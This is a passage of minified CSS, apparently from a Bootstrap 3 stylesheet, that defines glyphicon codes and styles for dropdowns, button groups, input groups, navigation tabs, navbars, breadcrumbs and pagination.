8"}.glyphicon-cog:before{content:"\e019"}.glyphicon-trash:before{content:"\e020"}.glyphicon-home:before{content:"\e021"}.glyphicon-file:before{content:"\e022"}.glyphicon-time:before{content:"\e023"}.glyphicon-road:before{content:"\e024"}.glyphicon-download-alt:before{content:"\e025"}.glyphicon-download:before{content:"\e026"}.glyphicon-upload:before{content:"\e027"}.glyphicon-inbox:before{content:"\e028"}.glyphicon-play-circle:before{content:"\e029"}.glyphicon-repeat:before{content:"\e030"}.glyphicon-refresh:before{content:"\e031"}.glyphicon-list-alt:before{content:"\e032"}.glyphicon-flag:before{content:"\e034"}.glyphicon-headphones:before{content:"\e035"}.glyphicon-volume-off:before{content:"\e036"}.glyphicon-volume-down:before{content:"\e037"}.glyphicon-volume-up:before{content:"\e038"}.glyphicon-qrcode:before{content:"\e039"}.glyphicon-barcode:before{content:"\e040"}.glyphicon-tag:before{content:"\e041"}.glyphicon-tags:before{content:"\e042"}.glyphicon-book:before{content:"\e043"}.glyphicon-print:before{content:"\e045"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-height:before{content:"\e050"}.glyphicon-text-width:before{content:"\e051"}.glyphicon-align-left:before{content:"\e052"}.glyphicon-align-center:before{content:"\e053"}.glyphicon-align-right:before{content:"\e054"}.glyphicon-align-justify:before{content:"\e055"}.glyphicon-list:before{content:"\e056"}.glyphicon-indent-left:before{content:"\e057"}.glyphicon-indent-right:before{content:"\e058"}.glyphicon-facetime-video:before{content:"\e059"}.glyphicon-picture:before{content:"\e060"}.glyphicon-map-marker:before{content:"\e062"}.glyphicon-adjust:before{content:"\e063"}.glyphicon-tint:before{content:"\e064"}.glyphicon-edit:before{content:"\e065"}.glyphicon-share:before{content:"\e066"}.glyphicon-check:before{content:"\e067"}.glyphicon-move:before{content:"\e068"}.glyphicon-step-backward:before{content:"\e069"}.glyphicon-fast-backward:before{content:"\e070"}.glyphicon-backward:before{content:"\e071"}.glyphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{content:"\e082"}.glyphicon-remove-sign:before{content:"\e083"}.glyphicon-ok-sign:before{content:"\e084"}.glyphicon-question-sign:before{content:"\e085"}.glyphicon-info-sign:before{content:"\e086"}.glyphicon-screenshot:before{content:"\e087"}.glyphicon-remove-circle:before{content:"\e088"}.glyphicon-ok-circle:before{content:"\e089"}.glyphicon-ban-circle:before{content:"\e090"}.glyphicon-arrow-left:before{content:"\e091"}.glyphicon-arrow-right:before{content:"\e092"}.glyphicon-arrow-up:before{content:"\e093"}.glyphicon-arrow-down:before{content:"\e094"}.glyphicon-share-alt:before{content:"\e095"}.glyphicon-resize-full:before{content:"\e096"}.glyphicon-resize-small:before{content:"\e097"}.glyphicon-exclamation-sign:before{content:"\e101"}.glyphicon-gift:before{content:"\e102"}.glyphicon-leaf:before{content:"\e103"}.glyphicon-eye-open:before{content:"\e105"}.glyphicon-eye-close:before{content:"\e106"}.glyphicon-warning-sign:before{content:"\e107"}.glyphicon-plane:before{content:"\e108"}.glyphicon-random:before{content:"\e110"}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{content:"\e116"}.glyphicon-folder-close:before{content:"\e117"}.glyphicon-folder-open:before{content:"\e118"}.glyphicon-resize-vertical:before{content:"\e119"}.glyphicon-resize-horizontal:before{content:"\e120"}.glyphicon-hdd:before{content:"\e121"}.glyphicon-bullhorn:before{content:"\e122"}.glyphicon-certificate:before{content:"\e124"}.glyphicon-thumbs-up:before{content:"\e125"}.glyphicon-thumbs-down:before{content:"\e126"}.glyphicon-hand-right:before{content:"\e127"}.glyphicon-hand-left:before{content:"\e128"}.glyphicon-hand-up:before{content:"\e129"}.glyphicon-hand-down:before{content:"\e130"}.glyphicon-circle-arrow-right:before{content:"\e131"}.glyphicon-circle-arrow-left:before{content:"\e132"}.glyphicon-circle-arrow-up:before{content:"\e133"}.glyphicon-circle-arrow-down:before{content:"\e134"}.glyphicon-globe:before{content:"\e135"}.glyphicon-tasks:before{content:"\e137"}.glyphicon-filter:before{content:"\e138"}.glyphicon-fullscreen:before{content:"\e140"}.glyphicon-dashboard:before{content:"\e141"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-usd:before{content:"\e148"}.glyphicon-gbp:before{content:"\e149"}.glyphicon-sort:before{content:"\e150"}.glyphicon-sort-by-alphabet:before{content:"\e151"}.glyphicon-sort-by-alphabet-alt:before{content:"\e152"}.glyphicon-sort-by-order:before{content:"\e153"}.glyphicon-sort-by-order-alt:before{content:"\e154"}.glyphicon-sort-by-attributes:before{content:"\e155"}.glyphicon-sort-by-attributes-alt:before{content:"\e156"}.glyphicon-unchecked:before{content:"\e157"}.glyphicon-expand:before{content:"\e158"}.glyphicon-collapse-down:before{content:"\e159"}.glyphicon-collapse-up:before{content:"\e160"}.glyphicon-log-in:before{content:"\e161"}.glyphicon-flash:before{content:"\e162"}.glyphicon-log-out:before{content:"\e163"}.glyphicon-new-window:before{content:"\e164"}.glyphicon-record:before{content:"\e165"}.glyphicon-save:before{content:"\e166"}.glyphicon-open:before{content:"\e167"}.glyphicon-saved:before{content:"\e168"}.glyphicon-import:before{content:"\e169"}.glyphicon-export:before{content:"\e170"}.glyphicon-send:before{content:"\e171"}.glyphicon-floppy-disk:before{content:"\e172"}.glyphicon-floppy-saved:before{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphicon-cutlery:before{content:"\e179"}.glyphicon-header:before{content:"\e180"}.glyphicon-compressed:before{content:"\e181"}.glyphicon-earphone:before{content:"\e182"}.glyphicon-phone-alt:before{content:"\e183"}.glyphicon-tower:before{content:"\e184"}.glyphicon-stats:before{content:"\e185"}.glyphicon-sd-video:before{content:"\e186"}.glyphicon-hd-video:before{content:"\e187"}.glyphicon-subtitles:before{content:"\e188"}.glyphicon-sound-stereo:before{content:"\e189"}.glyphicon-sound-dolby:before{content:"\e190"}.glyphicon-sound-5-1:before{content:"\e191"}.glyphicon-sound-6-1:before{content:"\e192"}.glyphicon-sound-7-1:before{content:"\e193"}.glyphicon-copyright-mark:before{content:"\e194"}.glyphicon-registration-mark:before{content:"\e195"}.glyphicon-cloud-download:before{content:"\e197"}.glyphicon-cloud-upload:before{content:"\e198"}.glyphicon-tree-conifer:before{content:"\e199"}.glyphicon-tree-deciduous:before{content:"\e200"}.glyphicon-briefcase:before{content:"\1f4bc"}.glyphicon-calendar:before{content:"\1f4c5"}.glyphicon-pushpin:before{content:"\1f4cc"}.glyphicon-paperclip:before{content:"\1f4ce"}.glyphicon-camera:before{content:"\1f4f7"}.glyphicon-lock:before{content:"\1f512"}.glyphicon-bell:before{content:"\1f514"}.glyphicon-bookmark:before{content:"\1f516"}.glyphicon-fire:before{content:"\1f525"}.glyphicon-wrench:before{content:"\1f527"}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px solid #000;border-right:4px solid transparent;border-bottom:0 dotted;border-left:4px solid transparent;content:""}.dropdown{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;list-style:none;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,0.175);box-shadow:0 6px 12px rgba(0,0,0,0.175);background-clip:padding-box}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:normal;line-height:1.428571429;color:#333;white-space:nowrap}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{color:#fff;text-decoration:none;background-color:#428bca}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{color:#fff;text-decoration:none;background-color:#428bca;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{color:#999}.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.428571429;color:#999}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{border-top:0 dotted;border-bottom:4px solid #000;content:""}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:1px}@media(min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}}.btn-default .caret{border-top-color:#333}.btn-primary .caret,.btn-success .caret,.btn-warning .caret,.btn-danger .caret,.btn-info .caret{border-top-color:#fff}.dropup .btn-default .caret{border-bottom-color:#333}.dropup .btn-primary .caret,.dropup .btn-success .caret,.dropup .btn-warning .caret,.dropup .btn-danger .caret,.dropup .btn-info .caret{border-bottom-color:#fff}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group>.btn,.btn-group-vertical>.btn{position:relative;float:left}.btn-group>.btn:hover,.btn-group-vertical>.btn:hover,.btn-group>.btn:focus,.btn-group-vertical>.btn:focus,.btn-group>.btn:active,.btn-group-vertical>.btn:active,.btn-group>.btn.active,.btn-group-vertical>.btn.active{z-index:2}.btn-group>.btn:focus,.btn-group-vertical>.btn:focus{outline:0}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar:before,.btn-toolbar:after{display:table;content:" "}.btn-toolbar:after{clear:both}.btn-toolbar .btn-group{float:left}.btn-toolbar>.btn+.btn,.btn-toolbar>.btn-group+.btn,.btn-toolbar>.btn+.btn-group,.btn-toolbar>.btn-group+.btn-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child>.btn:last-child,.btn-group>.btn-group:first-child>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child>.btn:first-child{border-bottom-left-radius:0;border-top-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group-xs>.btn{padding:5px 10px;padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-sm>.btn{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-lg>.btn{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,0.125);box-shadow:inset 0 3px 5px rgba(0,0,0,0.125)}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group:before,.btn-group-vertical>.btn-group:after{display:table;content:" "}.btn-group-vertical>.btn-group:after{clear:both}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-right-radius:0;border-bottom-left-radius:4px;border-top-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child>.btn:last-child,.btn-group-vertical>.btn-group:first-child>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child>.btn:first-child{border-top-right-radius:0;border-top-left-radius:0}.btn-group-justified{display:table;width:100%;border-collapse:separate;table-layout:fixed}.btn-group-justified .btn{display:table-cell;float:none;width:1%}[data-toggle="buttons"]>.btn>input[type="radio"],[data-toggle="buttons"]>.btn>input[type="checkbox"]{display:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group.col{float:none;padding-right:0;padding-left:0}.input-group .form-control{width:100%;margin-bottom:0}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:45px;padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:45px;line-height:45px}textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-addon,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:normal;line-height:1;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type="radio"],.input-group-addon input[type="checkbox"]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:last-child>.btn,.input-group-btn:last-child>.dropdown-toggle,.input-group-btn:first-child>.btn:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-4px}.input-group-btn>.btn:hover,.input-group-btn>.btn:active{z-index:2}.nav{padding-left:0;margin-bottom:0;list-style:none}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav:before,.nav:after{display:table;content:" "}.nav:after{clear:both}.nav>li{position:relative;display:block}.nav>li>a{position:relative;display:block;padding:10px 15px}.nav>li>a:hover,.nav>li>a:focus{text-decoration:none;background-color:#eee}.nav>li.disabled>a{color:#999}.nav>li.disabled>a:hover,.nav>li.disabled>a:focus{color:#999;text-decoration:none;cursor:not-allowed;background-color:transparent}.nav .open>a,.nav .open>a:hover,.nav .open>a:focus{background-color:#eee;border-color:#428bca}.nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.nav>li>a>img{max-width:none}.nav-tabs{border-bottom:1px solid #ddd}.nav-tabs>li{float:left;margin-bottom:-1px}.nav-tabs>li>a{margin-right:2px;line-height:1.428571429;border:1px solid transparent;border-radius:4px 4px 0 0}.nav-tabs>li>a:hover{border-color:#eee #eee #ddd}.nav-tabs>li.active>a,.nav-tabs>li.active>a:hover,.nav-tabs>li.active>a:focus{color:#555;cursor:default;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent}.nav-tabs.nav-justified{width:100%;border-bottom:0}.nav-tabs.nav-justified>li{float:none}.nav-tabs.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}}.nav-tabs.nav-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs.nav-justified>.active>a{border-bottom-color:#fff}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:5px}.nav-pills>li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:hover,.nav-pills>li.active>a:focus{color:#fff;background-color:#428bca}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified>li{float:none}.nav-justified>li>a{text-align:center}@media(min-width:768px){.nav-justified>li{display:table-cell;width:1%}}.nav-tabs-justified{border-bottom:0}.nav-tabs-justified>li>a{margin-right:0;border-bottom:1px solid #ddd}.nav-tabs-justified>.active>a{border-bottom-color:#fff}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tabbable:before,.tabbable:after{display:table;content:" "}.tabbable:after{clear:both}.tab-content>.tab-pane,.pill-content>.pill-pane{display:none}.tab-content>.active,.pill-content>.active{display:block}.nav .caret{border-top-color:#428bca;border-bottom-color:#428bca}.nav a:hover .caret{border-top-color:#2a6496;border-bottom-color:#2a6496}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-right-radius:0;border-top-left-radius:0}.navbar{position:relative;z-index:1000;min-height:50px;margin-bottom:20px;border:1px solid transparent}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}.navbar:before,.navbar:after{display:table;content:" "}.navbar:after{clear:both}@media(min-width:768px){.navbar{border-radius:4px}}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}.navbar-header:before,.navbar-header:after{display:table;content:" "}.navbar-header:after{clear:both}@media(min-width:768px){.navbar-header{float:left}}.navbar-collapse{max-height:340px;padding-right:15px;padding-left:15px;overflow-x:visible;border-top:1px solid transparent;box-shadow:inset 0 1px 0 rgba(255,255,255,0.1);-webkit-overflow-scrolling:touch}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse:before,.navbar-collapse:after{display:table;content:" "}.navbar-collapse:after{clear:both}.navbar-collapse.in{overflow-y:auto}@media(min-width:768px){.navbar-collapse{width:auto;border-top:0;box-shadow:none}.navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}.navbar-collapse.in{overflow-y:visible}.navbar-collapse .navbar-nav.navbar-left:first-child{margin-left:-15px}.navbar-collapse .navbar-nav.navbar-right:last-child{margin-right:-15px}.navbar-collapse .navbar-text:last-child{margin-right:0}}.container>.navbar-header,.container>.navbar-collapse{margin-right:-15px;margin-left:-15px}@media(min-width:768px){.container>.navbar-header,.container>.navbar-collapse{margin-right:0;margin-left:0}}.navbar-static-top{border-width:0 0 1px}@media(min-width:768px){.navbar-static-top{border-radius:0}}.navbar-fixed-top,.navbar-fixed-bottom{position:fixed;right:0;left:0;border-width:0 0 1px}@media(min-width:768px){.navbar-fixed-top,.navbar-fixed-bottom{border-radius:0}}.navbar-fixed-top{top:0;z-index:1030}.navbar-fixed-bottom{bottom:0;margin-bottom:0}.navbar-brand{float:left;padding:15px 15px;font-size:18px;line-height:20px}.navbar-brand:hover,.navbar-brand:focus{text-decoration:none}@media(min-width:768px){.navbar>.container .navbar-brand{margin-left:-15px}}.navbar-toggle{position:relative;float:right;padding:9px 10px;margin-top:8px;margin-right:15px;margin-bottom:8px;background-color:transparent;border:1px solid transparent;border-radius:4px}.navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}.navbar-toggle .icon-bar+.icon-bar{margin-top:4px}@media(min-width:768px){.navbar-toggle{display:none}}.navbar-nav{margin:7.5px -15px}.navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}@media(max-width:767px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;box-shadow:none}.navbar-nav .open .dropdown-menu>li>a,.navbar-nav .open .dropdown-menu .dropdown-header{padding:5px 15px 5px 25px}.navbar-nav .open .dropdown-menu>li>a{line-height:20px}.navbar-nav .open .dropdown-menu>li>a:hover,.navbar-nav .open .dropdown-menu>li>a:focus{background-image:none}}@media(min-width:768px){.navbar-nav{float:left;margin:0}.navbar-nav>li{float:left}.navbar-nav>li>a{padding-top:15px;padding-bottom:15px}}@media(min-width:768px){.navbar-left{float:left!important}.navbar-right{float:right!important}}.navbar-form{padding:10px 15px;margin-top:8px;margin-right:-15px;margin-bottom:8px;margin-left:-15px;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1);box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1)}@media(min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.navbar-form .form-control{display:inline-block}.navbar-form .radio,.navbar-form .checkbox{display:inline-block;padding-left:0;margin-top:0;margin-bottom:0}.navbar-form .radio input[type="radio"],.navbar-form .checkbox input[type="checkbox"]{float:none;margin-left:0}}@media(max-width:767px){.navbar-form .form-group{margin-bottom:5px}}@media(min-width:768px){.navbar-form{width:auto;padding-top:0;padding-bottom:0;margin-right:0;margin-left:0;border:0;-webkit-box-shadow:none;box-shadow:none}}.navbar-nav>li>.dropdown-menu{margin-top:0;border-top-right-radius:0;border-top-left-radius:0}.navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{border-bottom-right-radius:0;border-bottom-left-radius:0}.navbar-nav.pull-right>li>.dropdown-menu,.navbar-nav>li>.dropdown-menu.pull-right{right:0;left:auto}.navbar-btn{margin-top:8px;margin-bottom:8px}.navbar-text{float:left;margin-top:15px;margin-bottom:15px}@media(min-width:768px){.navbar-text{margin-right:15px;margin-left:15px}}.navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}.navbar-default .navbar-brand{color:#777}.navbar-default .navbar-brand:hover,.navbar-default .navbar-brand:focus{color:#5e5e5e;background-color:transparent}.navbar-default .navbar-text{color:#777}.navbar-default .navbar-nav>li>a{color:#777}.navbar-default .navbar-nav>li>a:hover,.navbar-default .navbar-nav>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:hover,.navbar-default .navbar-nav>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:hover,.navbar-default .navbar-nav>.disabled>a:focus{color:#ccc;background-color:transparent}.navbar-default .navbar-toggle{border-color:#ddd}.navbar-default .navbar-toggle:hover,.navbar-default .navbar-toggle:focus{background-color:#ddd}.navbar-default .navbar-toggle .icon-bar{background-color:#ccc}.navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e6e6e6}.navbar-default .navbar-nav>.dropdown>a:hover .caret,.navbar-default .navbar-nav>.dropdown>a:focus .caret{border-top-color:#333;border-bottom-color:#333}.navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:hover,.navbar-default .navbar-nav>.open>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.open>a .caret,.navbar-default .navbar-nav>.open>a:hover .caret,.navbar-default .navbar-nav>.open>a:focus .caret{border-top-color:#555;border-bottom-color:#555}.navbar-default .navbar-nav>.dropdown>a .caret{border-top-color:#777;border-bottom-color:#777}@media(max-width:767px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>li>a:focus{color:#333;background-color:transparent}.navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#ccc;background-color:transparent}}.navbar-default .navbar-link{color:#777}.navbar-default .navbar-link:hover{color:#333}.navbar-inverse{background-color:#222;border-color:#080808}.navbar-inverse .navbar-brand{color:#999}.navbar-inverse .navbar-brand:hover,.navbar-inverse .navbar-brand:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-text{color:#999}.navbar-inverse .navbar-nav>li>a{color:#999}.navbar-inverse .navbar-nav>li>a:hover,.navbar-inverse .navbar-nav>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:hover,.navbar-inverse .navbar-nav>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:hover,.navbar-inverse .navbar-nav>.disabled>a:focus{color:#444;background-color:transparent}.navbar-inverse .navbar-toggle{border-color:#333}.navbar-inverse .navbar-toggle:hover,.navbar-inverse .navbar-toggle:focus{background-color:#333}.navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#101010}.navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:hover,.navbar-inverse .navbar-nav>.open>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav>.dropdown>a:hover .caret{border-top-color:#fff;border-bottom-color:#fff}.navbar-inverse .navbar-nav>.dropdown>a .caret{border-top-color:#999;border-bottom-color:#999}.navbar-inverse .navbar-nav>.open>a .caret,.navbar-inverse .navbar-nav>.open>a:hover .caret,.navbar-inverse .navbar-nav>.open>a:focus .caret{border-top-color:#fff;border-bottom-color:#fff}@media(max-width:767px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#999}.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus{color:#fff;background-color:transparent}.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus{color:#fff;background-color:#080808}.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus{color:#444;background-color:transparent}}.navbar-inverse .navbar-link{color:#999}.navbar-inverse .navbar-link:hover{color:#fff}.breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}.breadcrumb>li{display:inline-block}.breadcrumb>li+li:before{padding:0 5px;color:#ccc;content:"/\00a0"}.breadcrumb>.active{color:#999}.pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}.pagination>li{display:inline}.pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;margin-left:-1px;line-height:1.428571429;text-decoration:none;background-color:#fff;border:1px solid #ddd}.pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-bottom-left-radius:4px;border-top-left-radius:4px}.pagination>li:last-child>a,.pagination>li:last-child>span{border-top-right-radius:4px;border-bottom-right-radius:4px}.pagination>li>a:hover,.pagination>li>span:hover,.pagination>li>a:focus,.pagination>li>span:focus{background-color:#eee}.pagination>.active>a,.pagination>.active>span,.pagination>.active>a:hover,.pagination>.active>span:hover,.pagination>.active>a:focus,.pagination>.active>span:focus{z-index:2;color:#fff;cursor:default;background-color:#428bca;border-color:#428bca}.pagination>.disabled>span,.pagination>.disabled>a,.pagination>.disabled>a:hover,.pagination>.disabled>a:focus{color:#999;cursor:not-allowed;background-color:#fff;border-color:#ddd}.pagination-lg>li>a,.pagination-lg>li>span{padding:10px 